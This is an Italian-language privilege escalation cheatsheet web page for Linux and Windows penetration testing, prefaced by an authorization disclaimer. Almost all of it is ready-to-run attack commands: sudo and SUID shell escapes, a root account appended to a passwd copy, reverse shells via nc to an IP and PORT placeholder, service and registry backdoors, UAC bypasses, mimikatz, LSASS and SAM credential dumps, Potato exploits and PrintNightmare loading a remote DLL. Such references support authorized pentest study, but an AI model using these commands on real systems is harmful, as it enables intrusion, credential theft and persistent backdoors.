Privilege Escalation Cheatsheet

Guida completa alle tecniche di privilege escalation per Linux e Windows. Comandi, exploit e metodologie per penetration testing.

Disclaimer

Utilizza queste tecniche solo su sistemi per cui hai autorizzazione esplicita. L'accesso non autorizzato e l'escalation di privilegi sono illegali e possono comportare gravi conseguenze legali.

Linux

Windows

Comandi Combinati Utili

Linux Enum Completo

Enumerazione completa sistema Linux

uname -a && cat /etc/issue && id && sudo -l && getcap -r / 2>/dev/null && find / -perm -4000 2>/dev/null

SUID Quick Search

Ricerca rapida binari SUID interessanti

find / -perm -4000 -type f 2>/dev/null | xargs ls -la

Windows Enum Completo

Enumerazione completa sistema Windows

systeminfo && whoami /all && net user && net localgroup administrators && sc query state=all

Service Exploit Check

Verifica servizi Windows vulnerabili

wmic service get name,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows\"

Password Hunting Linux

Ricerca password e credenziali Linux

grep -r "password" /home/ 2>/dev/null && cat ~/.bash_history | grep -i passw && env | grep -i pass

Password Hunting Windows

Ricerca password e credenziali Windows

findstr /si password *.txt *.xml *.ini *.config && reg query HKLM /f password /t REG_SZ /s

Enumerazione Sistema

uname -a

Info kernel e sistema

uname -a

cat /etc/issue

Distribuzione Linux

cat /etc/issue

cat /etc/*-release

Info versione OS

cat /etc/*-release

hostname

Nome host

hostname

Info utente corrente

whoami

Nome utente corrente

whoami

Utenti loggati

cat /etc/passwd

Lista utenti sistema

cat /etc/passwd | grep -v nologin

Sudo & Permissions

sudo -l

Comandi sudo disponibili

sudo -l

sudo -i

Shell root interattiva

sudo -i

sudo -s

Shell con privilegi sudo

sudo -s

sudo su -

Switch a root

sudo su -

cat /etc/sudoers

Configurazione sudoers

cat /etc/sudoers

sudo LD_PRELOAD

LD_PRELOAD exploit

sudo LD_PRELOAD=/tmp/evil.so program

sudo python -c

Shell Python con sudo

sudo python -c 'import os;os.system("/bin/bash")'

GTFOBins

Ricerca binari sudo exploit

https://gtfobins.github.io/

SUID/SGID Binaries

find SUID

Trova file SUID

find / -perm -4000 -type f 2>/dev/null

find SGID

Trova file SGID

find / -perm -2000 -type f 2>/dev/null

find SUID+SGID

Trova SUID e SGID

find / -perm -6000 -type f 2>/dev/null

find writable

File scrivibili non root

find / -writable -type f 2>/dev/null | grep -v proc

nmap SUID

Exploit nmap interactive

nmap --interactive; !sh

vim SUID

Exploit vim/vi

vim -c ':!/bin/bash'

cp SUID

Copia /etc/passwd

cp /etc/passwd /tmp/passwd && echo "root2::0:0:::/bin/bash" >> /tmp/passwd

Linux Capabilities

getcap

Lista capabilities

getcap -r / 2>/dev/null

getcap binary

Verifica capabilities

getcap /usr/bin/python3.8

CAP_SETUID

Python CAP_SETUID exploit

python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

CAP_DAC_READ_SEARCH

Lettura file privilegiati

tar -czvf /tmp/shadow.tar.gz /etc/shadow

setcap

Imposta capability

setcap cap_setuid+ep /usr/bin/python3

Cron Jobs

crontab -l

Cron jobs utente

crontab -l

cat /etc/crontab

System crontab

cat /etc/crontab

ls cron.d

Cron.d directory

ls -la /etc/cron.d/

cat cron.*

Cron periodici

cat /etc/cron.daily/* /etc/cron.hourly/*

pspy

Monitor processi

./pspy64 -pf -i 1000

writable cron

Trova cron scrivibili

find /etc/cron* -type f -writable 2>/dev/null

Servizi & Processi

ps aux

Processi attivi

ps aux | grep root

ps -ef

Lista processi completa

ps -ef | grep -v \[

systemctl

Servizi systemd

systemctl list-units --type=service

netstat

Porte in ascolto

netstat -tulpn | grep LISTEN

ss -tulpn

Socket statistics

ss -tulpn

service --status-all

Status servizi

service --status-all

Kernel Exploits

uname -r

Versione kernel

uname -r

searchsploit

Cerca exploit kernel

searchsploit linux kernel 4.15

DirtyCow

CVE-2016-5195

gcc -pthread dirty.c -o dirty -lcrypt && ./dirty

linux-exploit-suggester

Suggerisce exploit

./linux-exploit-suggester.sh

LinEnum

Enumerazione automatica

./LinEnum.sh -t

Password & Credenziali

cat /etc/shadow

Hash password

cat /etc/shadow

unshadow

Combina passwd e shadow

unshadow /etc/passwd /etc/shadow > hashes.txt

john

John the Ripper

john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

history

Cronologia comandi

cat ~/.bash_history | grep -i passw

find passwords

Cerca file password

grep -r "password" /home/ 2>/dev/null

env

Variabili ambiente

env | grep -i pass

ssh keys

Chiavi SSH

find / -name id_rsa 2>/dev/null

Wildcard & Path Injection

tar wildcard

Tar wildcard exploit

echo "mkfifo /tmp/f;nc IP PORT 0</tmp/f|/bin/sh>/tmp/f 2>&1;rm /tmp/f" > shell.sh && chmod +x shell.sh && touch -- --checkpoint=1 --checkpoint-action=exec=sh\ shell.sh

chown wildcard

Chown wildcard

touch -- --reference=/root/file.txt

PATH injection

Hijack PATH

export PATH=/tmp:$PATH && echo "/bin/bash" > /tmp/ls && chmod +x /tmp/ls

Docker & Containers

docker group

Verifica gruppo docker

groups | grep docker

docker privesc

Mount host filesystem

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

docker ps

Container attivi

docker ps -a

docker images

Immagini disponibili

docker images

Enumerazione Sistema

systeminfo

Informazioni sistema

systeminfo

hostname

Nome computer

hostname

whoami

Utente corrente

whoami /all

net user

Lista utenti

net user

net localgroup

Gruppi locali

net localgroup administrators

netstat

Connessioni rete

netstat -ano

ipconfig

Configurazione rete

ipconfig /all

route

Tabella routing

route print

Servizi Windows

sc query

Lista servizi

sc query state=all

wmic service

Info servizi WMIC

wmic service get name,pathname,startmode

icacls

Permessi file/dir

icacls "C:\Program Files\Service"

accesschk

Verifica permessi servizio

accesschk.exe -uwcqv "Everyone" *

sc qc

Config servizio

sc qc VulnService

sc config

Modifica servizio

sc config VulnService binpath= "C:\temp\nc.exe -nv IP PORT -e cmd.exe"

net start

Avvia servizio

net start VulnService

Registry & AutoRuns

reg query Run

AutoRun chiavi registro

reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run

reg query RunOnce

RunOnce registry

reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce

reg query AlwaysInstallElevated

AlwaysInstallElevated check

reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

reg add

Aggiungi chiave registry

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Backdoor /t REG_SZ /d "C:\backdoor.exe"

UAC Bypass

eventvwr.exe

EventVwr UAC bypass

reg add HKCU\Software\Classes\mscfile\shell\open\command /ve /d "cmd.exe" /f

fodhelper.exe

FodHelper UAC bypass

reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /d "cmd.exe" /f

computerdefaults

ComputerDefaults bypass

reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /d "powershell.exe" /f

UACMe

Tool automatico bypass

Akagi64.exe 23

Token Manipulation

whoami /priv

Privilegi correnti

whoami /priv

incognito

Meterpreter incognito

load incognito; list_tokens -u

impersonate_token

Impersona token

impersonate_token "NT AUTHORITY\SYSTEM"

SeImpersonatePrivilege

Potato exploits

JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -t *

PrintSpoofer

PrintSpoofer exploit

PrintSpoofer.exe -i -c cmd

RoguePotato

RoguePotato exploit

RoguePotato.exe -r IP -e "cmd.exe"

Password & Credenziali

cmdkey

Credenziali salvate

cmdkey /list

findstr password

Cerca password nei file

findstr /si password *.txt *.xml *.ini

reg query HKLM

Password nel registry

reg query HKLM /f password /t REG_SZ /s

SAM dump

Estrai hash SAM

reg save HKLM\SAM sam.hive && reg save HKLM\SYSTEM system.hive

mimikatz

Mimikatz dump

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

lsass dump

Dump LSASS

procdump.exe -accepteula -ma lsass.exe lsass.dmp

unattend.xml

Password in unattend

type C:\Windows\Panther\Unattend.xml

Exploit & CVE

wes.py

Windows Exploit Suggester

wes.py systeminfo.txt

EternalBlue

MS17-010

use exploit/windows/smb/ms17_010_eternalblue

MS16-032

Secondary Logon Handle

Invoke-MS16032 -Command "cmd.exe"

MS15-051

Client Copy Image

ms15-051x64.exe "cmd.exe"

PrintNightmare

CVE-2021-1675

Invoke-Nightmare -DLL \\IP\share\nightmare.dll

DLL Hijacking

procmon

Process Monitor

procmon.exe /AcceptEula /Quiet

PATH DLL

DLL search order

echo %PATH%

missing DLL

Trova DLL mancanti

listdlls.exe -u | findstr "not found"

icacls writable

Directory scrivibili

icacls "C:\Program Files\App" | findstr "(M)" | findstr "Everyone"

Scheduled Tasks

schtasks

Lista scheduled tasks

schtasks /query /fo LIST /v

taskschd.msc

Task Scheduler GUI

taskschd.msc

icacls task

Permessi task file

icacls C:\Tasks\backup.bat

schtasks create

Crea scheduled task

schtasks /create /tn Backdoor /tr "C:\backdoor.exe" /sc onstart /ru System

Nessun comando trovato per la tua ricerca.